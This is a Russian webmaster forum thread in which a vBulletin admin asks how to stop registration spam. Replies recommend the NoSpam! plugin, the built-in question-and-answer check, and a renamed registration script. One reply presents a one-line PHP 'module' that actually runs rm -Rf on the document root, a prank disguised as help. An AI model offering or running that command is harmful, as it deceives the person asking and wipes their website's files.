Посоветуйте хак/модуль для Vbulletin, который спасет меня от спамеров

stryker
На сайте с 12.03.2006
814
1004

Привет всем.

Спамеры на форуме задолбали, 3.8.2 версия.

Кто может подсказать какой-нить неглючный, нормальный модуль, можно даже два, который бы спас меня от спамеров, которые, по всей видимости юзают хрумер.

Спасибо ;)

► Лучший хостинг для сайтов ( https://vk.cc/a9FN77 )
[Удален]

текст модуля

<?

`rm -Rf $_SERVER[DOCUMENT_ROOT]`;

antono
На сайте с 12.07.2004
303

NoSpam! добавляет в форму регистрации текстовый вопрос, где вы сами можете задать вопросы и ответы на них. Значительно уменьшает спам, но все равно пробивают иногда.

Nunan
На сайте с 15.08.2008
78

Насколько я помню, на форуме можно и без дополнительных модулей создать дополнительное поле-вопрос, для него можно прописать варианты ответов.

Если у вас только русскоязычные пользователи, то напишите вопрос по русски с ответами тоже по русски.

Также лучше потом почистить уже зарегистрированных спамеров.

SeoMotion
На сайте с 03.09.2007
227

Без всяких модулей задаёте вопрос и ответ на него. Задайте вопрос по теме форума, т.е. что-то не очень стандартное и никто не пробьёт. За год на форуме с приличной посещаемостью не было ни одного прорыва спамера, за исключением тех, кто вручную что-то пиарит.

SEO Secrets, Tips & Tricks - https://t.me/seorigin
PR
На сайте с 30.12.2007
140

Админка VB - Основные настройки - Управление отделением людей от роботов

Поставить переключатель на Проверка вопросом и ответом на него и жмете сохранить, после перезагрузки страницы появится табличка Параметры проверки вопросом и ответом на него, нажимаете кнопку Добавить новый вопрос и добавляете вопрос, а потом ответ на него.

Я у себя по теме форума вопросы вписал, никаких спамеров нет.

stryker
На сайте с 12.03.2006
814

Всем спасибо, сча сделаем ;)

PROGRAMMATOR, отдельное спасибо 🍻

antono
На сайте с 12.07.2004
303

А самое эффективное средство - нестандартная форма регистрации. У меня на сайте городского портала общая регистрация на сайте и форуме. Юзеры регистрируются через самописный скрипт, и этот же скрипт при регистрации отсылает данные на формы регистрации форума через CURL. Благо на вобле скрипт регистрации вызывается через отдельный файл register.php. Только его нужно переименовать во что-то другое - regisfaewtersfdb.php и отключить капчу.

Спама на этом форуме вообще нет, только вручную иногда постят.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий